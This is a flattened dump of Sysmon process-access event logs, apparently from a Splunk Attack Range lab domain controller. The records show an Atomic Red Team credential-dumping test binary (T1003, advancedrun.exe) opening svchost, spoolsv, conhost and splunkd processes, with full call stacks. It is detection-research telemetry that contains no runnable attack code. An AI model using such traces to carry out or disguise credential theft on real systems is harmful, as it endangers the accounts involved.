C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
